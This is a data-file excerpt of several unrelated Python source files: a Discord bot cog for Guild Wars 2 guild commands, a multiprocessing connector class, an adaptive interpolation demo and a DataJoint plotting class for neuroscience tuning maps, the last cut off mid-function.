text stringlengths 957 885k |
|---|
import datetime
import discord
from discord.ext import commands
from discord.ext.commands.cooldowns import BucketType
from discord.ext.commands.errors import BadArgument
from ..exceptions import APIError, APIForbidden, APINotFound
from ..utils.chat import embed_list_lines, zero_width_space
class GeneralGuild:
@commands.group(case_insensitive=True)
async def guild(self, ctx):
"""Guild related commands."""
if ctx.invoked_subcommand is None:
await ctx.send_help(ctx.command)
@guild.command(name="info", usage="<guild name>")
@commands.cooldown(1, 20, BucketType.user)
async def guild_info(self, ctx, *, guild_name=None):
"""General guild stats
Required permissions: guilds
"""
# Read preferred guild from DB
try:
guild = await self.get_guild(ctx, guild_name=guild_name)
if not guild:
raise BadArgument
guild_id = guild["id"]
guild_name = guild["name"]
endpoint = "guild/{0}".format(guild_id)
results = await self.call_api(endpoint, ctx.author, ["guilds"])
except (IndexError, APINotFound):
return await ctx.send("Invalid guild name")
except APIForbidden:
return await ctx.send(
"You don't have enough permissions in game to "
"use this command")
except APIError as e:
return await self.error_handler(ctx, e)
data = discord.Embed(
description='General Info about {0}'.format(guild_name),
colour=await self.get_embed_color(ctx))
data.set_author(name="{} [{}]".format(results["name"], results["tag"]))
guild_currencies = [
"influence", "aetherium", "resonance", "favor", "member_count"
]
for cur in guild_currencies:
if cur == "member_count":
data.add_field(name='Members',
value="{} {}/{}".format(
self.get_emoji(ctx, "friends"),
results["member_count"],
str(results["member_capacity"])))
else:
data.add_field(name=cur.capitalize(),
value='{} {}'.format(self.get_emoji(ctx, cur),
results[cur]))
if "motd" in results:
data.add_field(name='Message of the day:',
value=results["motd"],
inline=False)
data.set_footer(text='A level {} guild'.format(results["level"]))
try:
await ctx.send(embed=data)
except discord.Forbidden:
await ctx.send("Need permission to embed links")
@guild.command(name="members", usage="<guild name>")
@commands.cooldown(1, 20, BucketType.user)
async def guild_members(self, ctx, *, guild_name=None):
"""Shows a list of members and their ranks.
Required permissions: guilds and in game permissions
"""
user = ctx.author
scopes = ["guilds"]
try:
guild = await self.get_guild(ctx, guild_name=guild_name)
if not guild:
raise BadArgument
guild_id = guild["id"]
guild_name = guild["name"]
endpoints = [
"guild/{}/members".format(guild_id),
"guild/{}/ranks".format(guild_id)
]
results, ranks = await self.call_multiple(endpoints, user, scopes)
except (IndexError, APINotFound):
return await ctx.send("Invalid guild name")
except APIForbidden:
return await ctx.send(
"You don't have enough permissions in game to "
"use this command")
except APIError as e:
return await self.error_handler(ctx, e)
data = discord.Embed(description=zero_width_space,
colour=await self.get_embed_color(ctx))
data.set_author(name=guild_name.title())
order_id = 1
# For each order the rank has, go through each member and add it with
# the current order increment to the embed
lines = []
async def get_guild_member_mention(account_name):
cursor = self.bot.database.iter(
"users", {
"$or": [{
"cogs.GuildWars2.key.account_name": account_name
}, {
"cogs.GuildWars2.keys.account_name": account_name
}]
})
async for doc in cursor:
member = ctx.guild.get_member(doc["_id"])
if member:
return member.mention
return ""
for order in ranks:
for member in results:
# Filter invited members
if member['rank'] != "invited":
member_rank = member['rank']
# associate order from /ranks with rank from /members
for rank in ranks:
if member_rank == rank['id']:
if rank['order'] == order_id:
mention = await get_guild_member_mention(
member["name"])
if mention:
mention = f" - {mention}"
line = "**{}**{}\n*{}*".format(
member['name'], mention, member['rank'])
if len(str(lines)) + len(line) < 6000:
lines.append(line)
order_id += 1
data = embed_list_lines(data, lines, "> **MEMBERS**", inline=True)
try:
await ctx.send(embed=data)
except discord.Forbidden:
await ctx.send("Need permission to embed links")
@guild.command(name="treasury", usage="<guild name>")
@commands.cooldown(1, 20, BucketType.user)
async def guild_treasury(self, ctx, *, guild_name=None):
"""Get list of current and needed items for upgrades
Required permissions: guilds and in game permissions"""
# Read preferred guild from DB
try:
guild = await self.get_guild(ctx, guild_name=guild_name)
if not guild:
raise BadArgument
guild_id = guild["id"]
guild_name = guild["name"]
endpoint = "guild/{0}/treasury".format(guild_id)
treasury = await self.call_api(endpoint, ctx.author, ["guilds"])
except (IndexError, APINotFound):
return await ctx.send("Invalid guild name")
except APIForbidden:
return await ctx.send(
"You don't have enough permissions in game to "
"use this command")
except APIError as e:
return await self.error_handler(ctx, e)
data = discord.Embed(description=zero_width_space,
colour=await self.get_embed_color(ctx))
data.set_author(name=guild_name.title())
item_counter = 0
amount = 0
lines = []
itemlist = []
for item in treasury:
res = await self.fetch_item(item["item_id"])
itemlist.append(res)
# Collect amounts
if treasury:
for item in treasury:
current = item["count"]
item_name = itemlist[item_counter]["name"]
needed = item["needed_by"]
for need in needed:
amount = amount + need["count"]
if amount != current:
line = "**{}**\n*{}*".format(
item_name,
str(current) + "/" + str(amount))
if len(str(lines)) + len(line) < 6000:
lines.append(line)
amount = 0
item_counter += 1
else:
await ctx.send("Treasury is empty!")
return
data = embed_list_lines(data, lines, "> **TREASURY**", inline=True)
try:
await ctx.send(embed=data)
except discord.Forbidden:
await ctx.send("Need permission to embed links")
@guild.command(name="log", usage="stash/treasury/members <guild name>")
@commands.cooldown(1, 10, BucketType.user)
async def guild_log(self, ctx, log_type, *, guild_name=None):
"""Get log of stash/treasury/members
Required permissions: guilds and in game permissions"""
state = log_type.lower()
member_list = [
"invited", "joined", "invite_declined", "rank_change", "kick"
]
if state not in ("stash", "treasury", "members"):
return await ctx.send_help(ctx.command)
try:
guild = await self.get_guild(ctx, guild_name=guild_name)
if not guild:
raise BadArgument
guild_id = guild["id"]
guild_name = guild["name"]
endpoint = "guild/{0}/log/".format(guild_id)
log = await self.call_api(endpoint, ctx.author, ["guilds"])
except (IndexError, APINotFound):
return await ctx.send("Invalid guild name")
except APIForbidden:
return await ctx.send(
"You don't have enough permissions in game to "
"use this command")
except APIError as e:
return await self.error_handler(ctx, e)
data = discord.Embed(description=zero_width_space,
colour=await self.get_embed_color(ctx))
data.set_author(name=guild_name.title())
lines = []
length_lines = 0
for entry in log:
if entry["type"] == state:
time = entry["time"]
timedate = datetime.datetime.strptime(
time, "%Y-%m-%dT%H:%M:%S.%fZ").strftime('%d.%m.%Y %H:%M')
user = entry["user"]
if state == "stash" or state == "treasury":
quantity = entry["count"]
if entry["item_id"] == 0:
item_name = self.gold_to_coins(ctx, entry["coins"])
quantity = ""
multiplier = ""
else:
itemdoc = await self.fetch_item(entry["item_id"])
item_name = itemdoc["name"]
multiplier = "x"
if state == "stash":
if entry["operation"] == "withdraw":
operator = " withdrew"
else:
operator = " deposited"
else:
operator = " donated"
line = "**{}**\n*{}*".format(
timedate, user + "{} {}{} {}".format(
operator, quantity, multiplier, item_name))
if length_lines + len(line) < 5500:
length_lines += len(line)
lines.append(line)
if state == "members":
entry_string = ""
if entry["type"] in member_list:
time = entry["time"]
timedate = datetime.datetime.strptime(
time,
"%Y-%m-%dT%H:%M:%S.%fZ").strftime('%d.%m.%Y %H:%M')
user = entry["user"]
if entry["type"] == "invited":
invited_by = entry["invited_by"]
entry_string = "{} has invited {} to the guild.".format(
invited_by, user)
elif entry["type"] == "joined":
entry_string = "{} has joined the guild.".format(user)
elif entry["type"] == "kick":
kicked_by = entry["kicked_by"]
if kicked_by == user:
entry_string = "{} has left the guild.".format(
user)
else:
entry_string = "{} has been kicked by {}.".format(
user, kicked_by)
elif entry["type"] == "rank_change":
old_rank = entry["old_rank"]
new_rank = entry["new_rank"]
if "changed_by" in entry:
changed_by = entry["changed_by"]
entry_string = "{} has changed the role of {} from {} to {}.".format(
changed_by, user, old_rank, new_rank)
else:
entry_string = "{} changed his role from {} to {}.".format(
user, old_rank, new_rank)
line = "**{}**\n*{}*".format(timedate, entry_string)
if length_lines + len(line) < 5500:
length_lines += len(line)
lines.append(line)
if not lines:
return await ctx.send("No {} log entries yet for {}".format(
state, guild_name.title()))
data = embed_list_lines(data, lines,
"> **{0} Log**".format(state.capitalize()))
try:
await ctx.send(embed=data)
except discord.Forbidden:
await ctx.send("Need permission to embed links")
@guild.command(name="default", usage="<guild name>")
@commands.guild_only()
@commands.cooldown(1, 10, BucketType.user)
@commands.has_permissions(manage_guild=True)
async def guild_default(self, ctx, *, guild_name=None):
""" Set your preferred guild for guild commands on this Discord Server.
Commands from the guild command group invoked
without a guild name will default to this guild.
Invoke this command without an argument to reset the default guild.
"""
guild = ctx.guild
if guild_name is None:
await self.bot.database.set_guild(guild, {
"guild_ingame": None,
}, self)
return await ctx.send(
"Your preferred guild is now reset for "
"this server. Invoke this command with a guild "
"name to set a default guild.")
endpoint_id = "guild/search?name=" + guild_name.replace(' ', '%20')
# Guild ID to Guild Name
try:
guild_id = await self.call_api(endpoint_id)
guild_id = guild_id[0]
except (IndexError, APINotFound):
return await ctx.send("Invalid guild name")
except APIForbidden:
return await ctx.send(
"You don't have enough permissions in game to "
"use this command")
except APIError as e:
return await self.error_handler(ctx, e)
# Write to DB, overwrites existing guild
await self.bot.database.set_guild(guild, {
"guild_ingame": guild_id,
}, self)
await ctx.send("Your default guild is now set to {} for this server. "
"All commands from the `guild` command group "
"invoked without a specified guild will default to "
"this guild. To reset, simply invoke this command "
"without specifying a guild".format(guild_name.title()))
|
<filename>erised/connector.py<gh_stars>0
from __future__ import annotations
import itertools
import multiprocessing as mp
import queue
from typing import Any, Dict, Iterator, Optional, Tuple
from erised.future import Future, FutureState
from erised.remote import run
from erised.task import CallTask, GetAttrTask, SetAttrTask, Task, TaskResult
class Connector:
def __init__(self, obj: Any):
self._obj = obj
self._queue_in: mp.Queue[TaskResult] = mp.Queue()
self._queue_out: mp.Queue[Task] = mp.Queue()
self._process = mp.Process(
target=run,
kwargs={
"obj": self._obj,
"queue_in": self._queue_out,
"queue_out": self._queue_in,
},
)
self._waiting_futures: Dict[int, Future] = {}
self._process.start()
def call(
self, attr: str, args: Tuple[Any, ...] = None, kwargs: Dict[str, Any] = None
) -> Future:
if args is None:
args = tuple()
if kwargs is None:
kwargs = {}
task = CallTask(
attr=attr,
args=args or tuple(),
kwargs=kwargs or dict(),
)
self._queue_out.put(task)
return self._create_future(task.id)
def setattr(self, attr: str, name: str, value: Any) -> Future:
task = SetAttrTask(attr=attr, name=name, value=value)
self._queue_out.put(task)
return self._create_future(task.id)
def getattr(self, attr: str, name: str) -> Future:
task = GetAttrTask(attr=attr, name=name)
self._queue_out.put(task)
return self._create_future(task.id)
def terminate(self):
self._process.terminate()
def _create_future(self, task_id: int) -> Future:
future = Future(task_id=task_id, connector=self)
self._waiting_futures[task_id] = future
return future
def _get(self, task_id: Optional[int] = None, timeout: Optional[int] = None):
if len(self._waiting_futures) == 0 or (
task_id is not None
and not min(self._waiting_futures) <= task_id <= max(self._waiting_futures)
):
raise ValueError(
f"Task wasn't set to run, or have already been run: task_id = {task_id}"
)
while len(self._waiting_futures) > 0:
task_result = self._queue_in.get(timeout=timeout)
future = self._waiting_futures.pop(task_result.task_id)
future._state = FutureState.FINISHED
future._result = task_result.value
future._exception = task_result.exception
if task_result.task_id == task_id:
return
def empty_queue(self):
self._get()
class LocalConnector(Connector):
def __init__(self, obj):
self._obj = obj
self._queue_in: queue.Queue[TaskResult] = queue.Queue()
self._queue_out: queue.Queue[Task] = queue.Queue()
self._id_counter: Iterator[int] = itertools.count()
self._waiting_futures = {}
def __del__(self):
self._process_all_waiting_tasks()
def terminate(self):
self._process_all_waiting_tasks()
def _get(self, task_id: int, timeout: Optional[int] = None):
self._process_all_waiting_tasks()
super()._get(task_id=task_id, timeout=timeout)
def _process_all_waiting_tasks(self):
while not self._queue_out.empty():
task = self._queue_out.get()
task_result = task.do(self._obj)
self._queue_in.put(task_result)
|
<gh_stars>1-10
"""
Demonstration of capabilities of the module
"""
from __future__ import absolute_import
import time
import numpy as np
import numpy.linalg as la
import scipy.special as spec
import matplotlib.pyplot as plt
import adaptive_interpolation.adapt as adapt
import adaptive_interpolation.generate as generate
import adaptive_interpolation.approximator as app
import adaptive_interpolation.adaptive_interpolation as adapt_i
try: import matplotlib.animation as animation
except: animate=False
try:
with_pyopencl = True
import pyopencl
except:
with_pyopencl = False
# bessel function for testing
def f(x):
#return np.sin(1./x)
return spec.jn(0, x)
def g(x):
return (1. - np.exp(-(1.1)*(x-1)))**2
def morse_potential(x):
return g(x)/g(.2)
# a function for testing
def f1(x0):
xs = []
for x in x0:
if x < 1:
xs.append(1 + x)
elif (1 <= x) and (x < 2.02):
xs.append(1 + x**2)
elif (2.02 <= x) and (x < 3.5):
xs.append(-3*np.log(x))
elif (3.5 <= x) and (x < 4.4):
xs.append(np.exp(np.sqrt(x)))
elif (4.4 <= x) and (x < 7.001):
xs.append(3)
elif (7.001 <= x) and (x < 9.306):
xs.append(np.sqrt(x**4.4) / 100.)
elif (9.306 <= x) and (x <= 11):
xs.append(x - 3)
return np.array(xs)
# plot the absolute errors as well as the actual and approximated functions
def my_plot(x, actual, approximation, abs_errors, allowed_error, ap):
plt.figure()
plt.title('Actual and Approximate values Graphed')
t, = plt.plot(x, actual, 'r', label='True Values')
e, = plt.plot(x, approximation, 'b', label='Interpolated Values')
plt.legend(handles=[t, e], loc=0)
plt.figure()
plt.yscale('log')
plt.title('Absolute Error in Interpolated Values')
a, = plt.plot(x, abs_errors+1e-17, 'g', label='Absolute Errors')
b, = plt.plot(x, 0*x + allowed_error, 'r', label='Maximum Allowed Relative Error')
all_ranges = []
for my_range in ap.ranges:
all_ranges.append(my_range[0])
all_ranges.append(my_range[1])
for val in list(set(all_ranges)):
plt.axvline(x=val)
c, = plt.plot(ap.used_midpoints, ap.used_errors, 'bs', label='Relative Errors')
plt.legend(handles=[a, b, c], loc=0, fontsize='small')
plt.show()
# This will demo the capabilities of interpolating a function with a fixed order method
# basis is a string specifying your basis. function is the given function to interpolate
# allowed error is the maximum relative error allowed on the entire interval.
def demo_adapt(function, order, allowed_error, basis,
adapt_type="Trivial", accurate=True, animate=False, a=0, b=10, opt=[]):
print("Creating Interpolant")
my_approx = adapt_i.make_interpolant(a, b, function, order,
allowed_error, basis, adapt_type, '32', accurate, optimizations=opt)
print("\nGenerated Code:\n")
N = 2**10
adapt_i.generate_code(my_approx, size=N, cpu=True)
print(my_approx.code)
print("Evaluating Interpolant")
x = np.linspace(a, b, N, dtype=np.float64)
if with_pyopencl and False:
est = adapt_i.run_approximation(x, my_approx)
else:
est = my_approx.evaluate_tree(x)
print("Evaluating Function")
true = function(x)
print("Plotting")
#not working with tree version
if animate:
fig = plt.figure()
ax1 = fig.add_subplot(1,2,2)
ax2 = fig.add_subplot(1,2,1)
#ax1.set_ylim(-2, 2)
ax2.set_yscale("log")
ims = []
# traverse levels 1 to end
for i in range(int(my_approx.num_levels)):
print("Plotting Level: ", i, '/', my_approx.num_levels-1)
ims.append([])
im0, = ax1.plot(x, function(x), 'r')
rel, = ax2.plot(x, 0*x+allowed_error, 'r')
ax1.set_xlabel("x")
ax1.set_ylabel("y")
ax1.set_title("True Function vs. Approximation")
ax2.set_xlabel("x")
ax2.set_ylabel("Errors")
ax2.set_title("Relative and Absolute Errors on Intervals")
ims[i].append(im0)
ims[i].append(rel)
t = np.linspace(a, b, 1e5)
y, data = my_approx.evaluate_tree(t, i+1, 1)
midpoints = [elem[0] for elem in data]
ranges = [elem[2] for elem in data]
rel_errors = [elem[3] for elem in data]
er = abs(np.array(y) - function(t))
im2, = ax1.plot(t, y, 'b')
im3, = ax2.plot(t, er, 'g')
for r in ranges:
im4 = ax2.axvline(x=r[0])
ims[i].append(im4)
im5, = ax2.plot(midpoints, rel_errors, 'bs')
ims[i].append(im2)
ims[i].append(im3)
ims[i].append(im5)
im6 = ax2.axvline(x=ranges[-1][1])
ims[i].append(im6)
ani = animation.ArtistAnimation(fig, ims, interval=1000)
ani.save("adapt.mp4")
plt.show()
else:
my_plot(x, true, est, abs(true-est), allowed_error, my_approx)
def main_demo():
print("\nIn this demo three functions will be evaluated and")
print("plotted, demonstrating some capabilities of this package.")
print("This includes a special function, a highly oscillatory")
print("function and a discontinuous function.")
print("The code generated to evaluate each function will also be displayed.")
# method interpolates a bessel function
print("\n0th order Bessel Function")
demo_adapt(f, 10, 1e-13, 'chebyshev', 'Remez')
# method interpolating a exact function
print("\nsin(1/x)")
my_f = lambda x: np.sin(np.float64(1.)/x)
demo_adapt(my_f, 20, 1e-10, 'chebyshev', a=.01, b=1)
# variable order interpolation method
print("\nA piecewise function")
demo_adapt(f1, 6, 1e-4, 'monomial', 'Variable')
# run the main program
if __name__ == "__main__":
#main_demo()
opt = ["arrays", "map"]
demo_adapt(f, 5, 1e-3, 'chebyshev', accurate=False, b=10, opt=opt)
|
<filename>dj_plotter/plotter.py
### DATAJOINT + PLOTTING CLASS
from copy import copy
import pathlib
from datetime import datetime
import numpy as np
import pandas as pd
# Drawing
from matplotlib import pyplot as plt
import seaborn as sns
from tqdm.auto import tqdm
# Load more colormaps
import cmasher as cmr
# ... for ROI processing
from scipy.ndimage.morphology import distance_transform_edt
from skimage.filters import gaussian
# Helpers
from .helpers.plotting_helpers import make_circular_colormap, make_linear_colormap
from .helpers.dj_utils import make_multi_recording_object_dict, get_signal_indices
# Stylesheets
# Imports default styles and style dictionary
from .helpers.stylesheet import *
# Additional matplotlib options
import matplotlib as mpl
mpl.rcParams['pdf.fonttype'] = 42 # Fix bug in PDF export
from mpl_toolkits.axes_grid1 import make_axes_locatable
# Load base schema
import datajoint as dj
schema = dj.schema(dj.config['dj_imaging.database'])
schema.spawn_missing_classes()
### PLOTTING CLASS
class dj_plotter():
''' Generate plots from datajoint objects. '''
# Define which attributes (=column names) are required for functions to run
RECORDING_HASH = 'recording_name'
RECORDING_HASH_OV = 'base_session'
ANIMAL_NAME = 'animal_name'
TIMESTAMP = 'timestamp'
ATTR_TUNINGMAP = ['tuningmap','mask_tm','cell_id']
ATTR_AUTOCORR = ['acorr','cell_id']
ATTR_ROIS = ['center_x','center_y','xpix','ypix','x_range','y_range', 'lambda']
ATTR_ROIS_CORR = ['center_x_corr','center_y_corr','xpix_corr','ypix_corr','x_range_microns_eff','y_range_microns_eff', 'lambda_corr']
ATTR_TRACKING = ['x_pos','y_pos','speed','head_angle']
ATTR_PATHEVENT = [*ATTR_TRACKING, 'signal', 'x_pos_signal','y_pos_signal','head_angle_signal']
ATTR_TUNINGMAP_OV = [] # For object vector case these data are retrieved "online"
ATTR_PATHEVENT_OV = [] # "
ATTR_HDTUNING = ['angle_centers', 'angular_occupancy', 'angular_tuning']
def __init__(self, dj_object, keys=None, *args, **kwargs):
'''
Takes a datajoint object (table or join) and generates figures.
Example usage:
Parameters
----------
dj_object : datajoint.expression.Join or table (basic restriction)
Actual join object.
keys : dict or numpy array
Keys to be looped over. Retrieved by .fetch() operation (dict or numpy array)
**kwargs:
plots_per_view : int
Number of subplots per figure (maximum 25, since layout is 5x5)
font_scale : float
Seaborn font_scale
total : int
Total number of plots to show
save_path : string or Pathlib path
If given, will auto-export the figure under this path
save_format : string
'pdf', 'png', ...
Default: 'pdf'
style : string
'dark_background', 'default'
Check plt.style.available for all possible options
Default: 'default'
'''
# Main input
self.dj_object = dj_object
self.keys = keys
# Process keywords
self.plots_per_view = kwargs.get('plots_per_view',25)
if self.plots_per_view > 25:
raise ValueError('Maximum number of subplots is 25')
self.font_scale = kwargs.get('font_scale', 1.)
self.total = kwargs.get('total', None)
self.save_path = kwargs.get('save_path', None)
if self.save_path is not None:
if isinstance(self.save_path, str):
self.save_path = pathlib.Path(self.save_path)
self.save_format = kwargs.get('save_format', 'pdf')
assert self.save_format in ['pdf','png','jpg'], f'Format "{self.save_format}" not recognized'
self.style = kwargs.get('style', 'default')
if self.style != 'default':
assert self.style in plt.style.available, f'Plotting style "{self.style}" does not exist.\nPossible options:\n{plt.style.available}'
def __repr__(self):
return f'DJ plotter class\nAvailable attributes:\n{self.__attributes}'
@property
def __attributes(self):
''' Return attributes in datajoint object (column names) '''
return self.dj_object.heading.names
def __check_join_integrity(self, keyword):
'''
Check if attribute (=column) exists in datajoint join object.
Parameters
----------
keyword : string or list of strings
These are the keywords that should be checked
Returns
-------
valid : boolean
True only if all keywords have been matched
'''
valid = False
if isinstance(keyword,str):
valid = keyword in self.__attributes
elif isinstance(keyword,list):
valid = all([self.__check_join_integrity(key_) for key_ in keyword])
return valid
@property
def __create_figure_single(self):
''' Create standard figure'''
sns.set(font_scale=self.font_scale)
plt.style.use(self.style)
return plt.figure(figsize=(10,10))
@property
def __create_figure_grid(self):
''' Create standard figure for grid display of subplots '''
sns.set(font_scale=self.font_scale)
plt.style.use(self.style)
return plt.figure(figsize=(20,20))
@property
def __create_figure_grid_ov_2(self):
''' Create standard (object vector) figure for grid display of 2 subplots '''
sns.set(font_scale=self.font_scale)
plt.style.use(self.style)
return plt.figure(figsize=(6,3))
@property
def __create_figure_grid_ov_3(self):
''' Create standard (object vector) figure for grid display of 3 subplots '''
sns.set(font_scale=self.font_scale)
plt.style.use(self.style)
return plt.figure(figsize=(9,3))
def __title(self, entry, display_score, hash_or_animal, show_cell=True, ov=False):
''' Create subplot title string '''
if hash_or_animal == 'hash':
if not ov:
hash_or_animal_string = entry[self.RECORDING_HASH]
else:
hash_or_animal_string = entry[self.RECORDING_HASH_OV]
elif hash_or_animal == 'animal':
ts = datetime.strftime(entry[self.TIMESTAMP],'| %d.%m.%Y | %H:%M')
hash_or_animal_string = f'{entry[self.ANIMAL_NAME]} {ts}'
if show_cell:
if display_score is not None:
title = r'C{} {} | {:.2f}'.format(entry['cell_id'], hash_or_animal_string, entry[display_score])
else:
title = r'C{} {}'.format(entry['cell_id'], hash_or_animal_string)
else:
title = r'{}'.format(hash_or_animal_string)
return title
def __now(self):
return datetime.strftime(datetime.now(),'%d.%m.%Y %H-%M-%S-%f')
def __tqdm_iterator(self, iterator, total, desc, leave=False):
''' Create a tqdm progress bar '''
return tqdm(enumerate(iterator), desc=desc, total=total, leave=leave)
####################################################################################################
######################### DRAWING
def tuningmaps(self, **kwargs):
'''
Plot tuningmaps in 5x5 grid
Optionally shows score for every subplot if available.
Parameters
----------
**kwargs:
cmap : string
Valid matplotlib colormap string
https://matplotlib.org/3.2.1/tutorials/colors/colormaps.html
or https://github.com/1313e/CMasher
hash_or_animal: string
'hash' or 'animal'
Determines whether session name (hash) or animal/timestamp
combination should be displayed in title of each subplot.
Defaults to 'animal'
display_score : string
Name of the score (=column name) to display in title
of each subplot.
Defaults to None.
axes_lw : float
axes linewidth. Default 0.5.
display_title : bool
Show title?
cue_card_pos : list or string
Cue card position in (tracked) field ['north','south','west','east']
ax : axis
Matplotlib axis to draw into
'''
# Process kwargs
cmap = kwargs.get('cmap', 'magma')
cmap = plt.get_cmap(cmap)
display_score = kwargs.get('display_score', None)
hash_or_animal = kwargs.get('hash_or_animal', 'animal')
axes_lw = kwargs.get('axes_lw', 5.)
display_title = kwargs.get('display_title', True)
cue_card_pos = kwargs.get('cue_card_pos', None)
ax = kwargs.get('ax', None)
# Prepare list of attributes to check:
ATTR_TUNINGMAP = self.ATTR_TUNINGMAP.copy()
# Display session hash or animal_name/timestamp?
if hash_or_animal == 'hash':
ATTR_TUNINGMAP.append(self.RECORDING_HASH)
elif hash_or_animal == 'animal':
ATTR_TUNINGMAP.append(self.ANIMAL_NAME)
ATTR_TUNINGMAP.append(self.TIMESTAMP)
else:
raise NameError(f'Keyword "{hash_or_animal}" not recognized')
# Display a score?
if display_score is not None and isinstance(display_score, str):
ATTR_TUNINGMAP.append(display_score)
else:
display_score = None
# Check attributes in datajoint join
if not self.__check_join_integrity(ATTR_TUNINGMAP):
raise KeyError('One or more of these were not found: {}'.format(ATTR_TUNINGMAP))
###########################################################################
############### START PLOTTING FUNCTIONS
plot_counter = 0
if self.keys is not None:
iterator = self.keys
use_keys = True
else:
iterator = self.dj_object
use_keys = False
if self.total is not None:
total = self.total
else:
total = len(iterator)
if (ax is not None) and (total > 1):
raise NotImplementedError(f'Axis was given, and total number of plots = {total}.\
\nMake sure you have only one element to plot!')
elif ax is not None:
external_axis = True
elif ax is None:
external_axis = False
# Cue card positions
if cue_card_pos is not None:
if isinstance(cue_card_pos, str):
cue_card_pos = [cue_card_pos] * total
else:
assert len(cue_card_pos) == total, \
'Length of cue card position array does not match length of cells to plot'
# Make loop with tqdm progress bar
tqdm_iterator = self.__tqdm_iterator(iterator, total-1, 'Drawing tuningmaps')
if not external_axis:
figure = self.__create_figure_grid
for no, key in tqdm_iterator:
if no == total:
if (plot_counter > 0) and not external_axis:
if self.save_path is not None:
print('Saving figure under {}'.format(str(self.save_path)))
if plot_counter < 2:
# Show the actual cell ids in export path
export_name = f'tuningmaps {key["recording_name"]} cell {key["cell_id"]}.{self.save_format}'
else:
export_name = f'tuningmaps n={plot_counter}.{self.save_format}'
figure.savefig(self.save_path / export_name, dpi=300, bbox_inches='tight')
else:
plt.show()
# Premature stop? Make sure you close things gracefully:
tqdm_iterator.refresh()
tqdm._instances.clear()
break
# Use keys or join object?
if use_keys:
entry = (self.dj_object & key).fetch1()
else:
entry = key
tuningmap = np.ma.masked_array(entry['tuningmap'], mask=entry['mask_tm'])
tuningmap = tuningmap.filled(fill_value=0)
# Get subplot title
plot_counter += 1
if not external_axis:
ax = figure.add_subplot(5,5,plot_counter)
# Check for custom styling
if self.style in styles:
cc_color = styles[self.style].get('cue_card_color_tuningmap', CUE_CARD_COLOR_TM)
axes_color = styles[self.style].get('axes_color_tuningmap', AXES_COLOR_TM)
else:
cc_color = CUE_CARD_COLOR_TM
axes_color = AXES_COLOR_TM
ax.imshow(tuningmap, cmap=cmap, vmin=np.nanmin(tuningmap), vmax=np.nanpercentile(tuningmap,99))
ax.set_aspect('equal')
ax.get_xaxis().set_ticks([]);ax.get_yaxis().set_ticks([])
if display_title:
title = self.__title(entry, display_score, hash_or_animal)
ax.set_title(title)
for axis in ['top','bottom','left','right']:
ax.spines[axis].set_linewidth(axes_lw)
ax.spines[axis].set_color(axes_color)
# Draw cue card?
if cue_card_pos is not None:
size = tuningmap.shape
card_pos = cue_card_pos[no]
if card_pos == 'west':
ax.plot([0.,0.],[size[0]/2-5,size[0]/2+5], lw=5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
elif card_pos == 'east':
ax.plot([size[1]-1,size[1]-1],[size[0]/2-5,size[0]/2+5], lw=5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
elif card_pos == 'north':
ax.plot([size[1]/2-5,size[1]/2+5],[0,0], lw=5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
elif card_pos == 'south':
ax.plot([size[1]/2-5,size[1]/2+5],[size[0]-1,size[0]-1], lw=5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
else:
raise NotImplementedError(f'Card position {card_pos} not understood. Choose ["west", "east", "north", "south"]')
if plot_counter >= self.plots_per_view:
if (self.save_path is not None) and not external_axis:
print('Saving figure under {}'.format(str(self.save_path)))
if plot_counter < 2:
# Show the actual cell ids in export path
export_name = f'tuningmaps {key["recording_name"]} cell {key["cell_id"]}.{self.save_format}'
else:
export_name = f'tuningmaps n={plot_counter}.{self.save_format}'
figure.savefig(self.save_path / export_name, dpi=300, bbox_inches='tight')
else:
plt.show()
plot_counter = 0
# Create next figure
if not external_axis:
figure = self.__create_figure_grid
return
def autocorr(self, **kwargs):
'''
Plot autocorrelations in 5x5 grid
Optionally shows score for every subplot if available.
Parameters
----------
**kwargs:
cmap : string
Valid matplotlib colormap string
https://matplotlib.org/3.2.1/tutorials/colors/colormaps.html
or https://github.com/1313e/CMasher
hash_or_animal: string
'hash' or 'animal'
Determines whether session name (hash) or animal/timestamp
combination should be displayed in title of each subplot.
Defaults to 'animal'
display_score : string
Name of the score (=column name) to display in title
of each subplot.
Defaults to None.
axes_lw : float
axes linewidth. Default 5.
display_title : bool
Show title?
ax : axis
Matplotlib axis to draw into
'''
# Process kwargs
cmap = kwargs.get('cmap', 'magma')
cmap = plt.get_cmap(cmap)
display_score = kwargs.get('display_score', None)
hash_or_animal = kwargs.get('hash_or_animal', 'animal')
axes_lw = kwargs.get('axes_lw', 5.)
display_title = kwargs.get('display_title', True)
ax = kwargs.get('ax', None)
# Prepare list of attributes to check:
ATTR_AUTOCORR = self.ATTR_AUTOCORR.copy()
# Display session hash or animal_name/timestamp?
if hash_or_animal == 'hash':
ATTR_AUTOCORR.append(self.RECORDING_HASH)
elif hash_or_animal == 'animal':
ATTR_AUTOCORR.append(self.ANIMAL_NAME)
ATTR_AUTOCORR.append(self.TIMESTAMP)
else:
raise NameError(f'Keyword "{hash_or_animal}" not recognized')
# Display a score?
if display_score is not None and isinstance(display_score, str):
ATTR_AUTOCORR.append(display_score)
else:
display_score = None
# Check attributes in datajoint join
if not self.__check_join_integrity(ATTR_AUTOCORR):
raise KeyError('One or more of these were not found: {}'.format(ATTR_AUTOCORR))
###########################################################################
############### START PLOTTING FUNCTIONS
plot_counter = 0
if self.keys is not None:
iterator = self.keys
use_keys = True
else:
iterator = self.dj_object
use_keys = False
if self.total is not None:
total = self.total
else:
total = len(iterator)
if (ax is not None) and (total > 1):
raise NotImplementedError(f'Axis was given, and total number of plots = {total}.\
\nMake sure you have only one element to plot!')
elif ax is not None:
external_axis = True
elif ax is None:
external_axis = False
# Make loop with tqdm progress bar
tqdm_iterator = self.__tqdm_iterator(iterator, total-1, 'Drawing autocorrelations')
if not external_axis:
figure = self.__create_figure_grid
for no, key in tqdm_iterator:
if no == total:
if (plot_counter > 0) and not external_axis:
if self.save_path is not None:
print('Saving figure under {}'.format(str(self.save_path)))
if plot_counter < 2:
# Show the actual cell ids in export path
export_name = f'autocorr {key["recording_name"]} cell {key["cell_id"]}.{self.save_format}'
else:
export_name = f'autocorr n={plot_counter}.{self.save_format}'
figure.savefig(self.save_path / export_name, dpi=300, bbox_inches='tight')
else:
plt.show()
# Premature stop? Make sure you close things gracefully:
tqdm_iterator.refresh()
tqdm._instances.clear()
break
# Use keys or join object?
if use_keys:
